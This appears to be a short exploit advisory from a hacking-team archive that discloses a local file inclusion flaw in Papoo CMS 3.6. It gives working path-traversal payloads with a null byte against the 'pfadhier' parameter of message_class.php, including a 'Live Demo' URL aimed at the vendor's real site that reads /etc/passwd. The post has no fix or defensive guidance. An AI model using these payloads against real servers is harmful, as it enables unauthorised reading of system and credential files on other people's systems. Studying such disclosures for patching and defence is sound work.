Papoo CMS version 3.6 suffers from a local file inclusion vulnerability.
3bbe1f8e6015aea3a6502c48a1b2139533fa607a78222502928e6d20646af997
#########################################################################################################
[+] Papoo CMS 3.6 Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] www.hellzone.info
#########################################################################################################
[+] Script Homepage : http://www.papoo-cms.com/
[+] Local File Inclusion
- PoC :
http://127.0.0.1/[path]/lib/classes/message_class.php?pfadhier=[Local
File]%00
- Example :
http://127.0.0.1/path/lib/classes/message_class.php?pfadhier=../../../../../../boot.ini%00
- Live Demo
http://www.papoo-cms.com/lib/classes/message_class.php?pfadhier=../../../../../../etc/passwd%00
#########################################################################################################